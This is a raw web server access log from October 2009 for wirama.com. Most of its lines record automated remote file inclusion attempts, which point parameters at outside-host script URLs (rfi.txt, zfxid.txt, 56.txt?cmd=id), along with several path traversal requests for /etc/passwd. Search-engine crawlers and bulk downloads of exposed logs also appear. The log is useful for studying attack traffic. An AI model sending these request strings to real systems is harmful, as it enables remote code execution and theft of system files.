65.55.106.235 - - [04/Oct/2009:09:53:54 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.169.136.128 - - [04/Oct/2009:10:18:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
81.169.136.128 - - [04/Oct/2009:10:18:48 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
81.169.136.128 - - [04/Oct/2009:10:21:18 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
81.169.136.128 - - [04/Oct/2009:10:21:18 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
87.250.230.32 - - [04/Oct/2009:10:22:09 -0700] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
81.169.136.128 - - [04/Oct/2009:10:28:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "wirama.com"
195.137.160.36 - - [04/Oct/2009:10:35:33 -0700] "GET /logs/access_090331.log//components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.137.160.36 - - [04/Oct/2009:10:35:33 -0700] "GET /logs//components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.137.160.36 - - [04/Oct/2009:10:35:33 -0700] "GET /components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:10:37:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:10:37:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:10:37:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:10:37:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
69.162.74.91 - - [04/Oct/2009:10:38:31 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:38:31 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:38:32 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:38:41 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.100.181.217 - - [04/Oct/2009:10:38:51 -0700] "GET /logs//components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:10:38:51 -0700] "GET /logs/access_090601.log//components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.181.217 - - [04/Oct/2009:10:38:52 -0700] "GET /components/errors.php?error=http://maple.k-league.ca/bbs//nyawa.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.162.74.91 - - [04/Oct/2009:10:39:15 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:39:15 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:39:15 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.162.74.91 - - [04/Oct/2009:10:39:20 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.77 - - [04/Oct/2009:10:42:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.77 - - [04/Oct/2009:10:43:45 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:47:21 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://coinheaven.com/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:47:21 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://coinheaven.com/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:55:49 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:55:49 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:55:49 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "wirama.com"
74.55.77.218 - - [04/Oct/2009:10:55:49 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "wirama.com"
207.7.108.203 - - [04/Oct/2009:11:14:02 -0700] "GET /logs/php?skin_board_path=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:11:14:02 -0700] "GET /php?skin_board_path=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:11:16:42 -0700] "GET /logs/index.php?skin_board_path=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
207.7.108.203 - - [04/Oct/2009:11:16:42 -0700] "GET /index.php?skin_board_path=http://www.klickcomk.com/js/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
193.24.32.53 - - [04/Oct/2009:11:21:57 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)" "www.wirama.com"
65.55.207.77 - - [04/Oct/2009:11:26:46 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:28:52 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:28:55 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:28:59 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:29:01 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.30.78.215 - - [04/Oct/2009:11:36:01 -0700] "GET /logs/access_090801.log HTTP/1.0" 200 159702 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
91.149.157.136 - - [04/Oct/2009:11:40:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
91.149.157.136 - - [04/Oct/2009:11:40:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
216.71.84.235 - - [04/Oct/2009:11:41:04 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.establish.ba/root/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "wirama.com"
216.71.84.235 - - [04/Oct/2009:11:41:04 -0700] "GET /logs/access_090801.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.establish.ba/root/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "wirama.com"
216.71.84.235 - - [04/Oct/2009:11:41:04 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.establish.ba/root/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "wirama.com"
91.149.157.136 - - [04/Oct/2009:11:42:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
91.149.157.136 - - [04/Oct/2009:11:42:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
193.24.32.53 - - [04/Oct/2009:11:43:34 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows XP 5.1; MSIE 7.0.5730.13)" "www.wirama.com"
95.14.85.65 - - [04/Oct/2009:11:52:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bluepadma.com/56.txt?cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:42 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:42 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:43 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:52 -0700] "GET /logs/access_090330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:11:54:52 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.149.157.136 - - [04/Oct/2009:11:59:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
91.149.157.136 - - [04/Oct/2009:11:59:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.profacepaints.com/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
217.237.150.52 - - [04/Oct/2009:12:19:22 -0700] "GET /logs/access_090601.log HTTP/1.0" 200 274569 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.53 - - [04/Oct/2009:12:32:30 -0700] "GET /logs/ HTTP/1.0" 200 3121 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.53 - - [04/Oct/2009:12:32:30 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
77.242.37.212 - - [04/Oct/2009:12:41:38 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:41:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:41:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:44:07 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:44:11 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:44:11 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:12:48:53 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:12:48:53 -0700] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:12:48:53 -0700] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:51:12 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:12:52:13 -0700] "GET /logs/access_090601.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:12:52:57 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.237.150.206 - - [04/Oct/2009:13:00:43 -0700] "GET /logs/access_081231.log HTTP/1.0" 200 303093 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.206 - - [04/Oct/2009:13:00:43 -0700] "GET /logs/access.log HTTP/1.0" 200 440840 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.54 - - [04/Oct/2009:13:00:46 -0700] "GET /logs/access_090101.log HTTP/1.0" 200 7270 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.144 - - [04/Oct/2009:13:00:47 -0700] "GET /logs/access_090201.log HTTP/1.0" 200 475690 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.145 - - [04/Oct/2009:13:00:47 -0700] "GET /logs/access_090301.log HTTP/1.0" 200 620059 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:00:52 -0700] "GET /logs/access_090330.log HTTP/1.0" 200 67247 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:00:52 -0700] "GET /logs/access_090329.log HTTP/1.0" 206 842627 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.148.72 - - [04/Oct/2009:13:00:53 -0700] "GET /logs/access_090329.log HTTP/1.0" 200 1685256 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.136 - - [04/Oct/2009:13:00:55 -0700] "GET /logs/access_090401.log HTTP/1.0" 200 74403 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.136 - - [04/Oct/2009:13:00:55 -0700] "GET /logs/access_090331.log HTTP/1.0" 200 82112 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:00:58 -0700] "GET /logs/access_090601.log HTTP/1.0" 200 274569 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:01:11 -0700] "GET /logs/access_090501.log HTTP/1.0" 206 1372571 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:01:41 -0700] "GET /logs/access_090531.log HTTP/1.0" 206 1968653 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.117 - - [04/Oct/2009:13:01:43 -0700] "GET /logs/access_090701.log HTTP/1.0" 206 927860 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.117 - - [04/Oct/2009:13:02:02 -0700] "GET /logs/access_090701.log HTTP/1.0" 206 1855721 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:02:04 -0700] "GET /logs/access_090501.log HTTP/1.0" 200 2293760 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.207 - - [04/Oct/2009:13:02:05 -0700] "GET /logs/access_090701.log HTTP/1.0" 200 2752512 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.54 - - [04/Oct/2009:13:02:09 -0700] "GET /logs/access_090801.log HTTP/1.0" 200 159702 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:02:12 -0700] "GET /logs/access_090501.log HTTP/1.0" 206 2293760 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:02:28 -0700] "GET /logs/access_090501.log HTTP/1.0" 206 2293760 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:02:28 -0700] "GET /logs/access_090701.log HTTP/1.0" 206 2752512 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:02:28 -0700] "GET /logs/access_090531.log HTTP/1.0" 206 2883584 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:02:31 -0700] "GET /logs/access_090701.log HTTP/1.0" 206 2752512 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:02:31 -0700] "GET /logs/access_090531.log HTTP/1.0" 200 3014656 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:02:35 -0700] "GET /logs/access_090531.log HTTP/1.0" 206 2883584 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.144 - - [04/Oct/2009:13:02:38 -0700] "GET /logs/access_090731.log HTTP/1.0" 206 2010329 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.178 - - [04/Oct/2009:13:02:56 -0700] "GET /logs/access_091001.log HTTP/1.0" 206 1184961 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.118 - - [04/Oct/2009:13:02:59 -0700] "GET /logs/access_090901.log HTTP/1.0" 206 2409577 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:02 -0700] "GET /logs/access_090801.log//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:02 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:02 -0700] "GET /export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.237.151.207 - - [04/Oct/2009:13:03:13 -0700] "GET /logs/scripts.log HTTP/1.0" 200 2336 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.151.53 - - [04/Oct/2009:13:03:14 -0700] "GET /logs/access_090731.log HTTP/1.0" 200 2883584 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.148.72 - - [04/Oct/2009:13:03:24 -0700] "GET /logs/access_091001.log HTTP/1.0" 206 2097152 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:29 -0700] "GET /export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:29 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:13:03:29 -0700] "GET /logs/access_090801.log//export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.237.151.144 - - [04/Oct/2009:13:03:31 -0700] "GET /logs/access_090731.log HTTP/1.0" 206 3014656 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
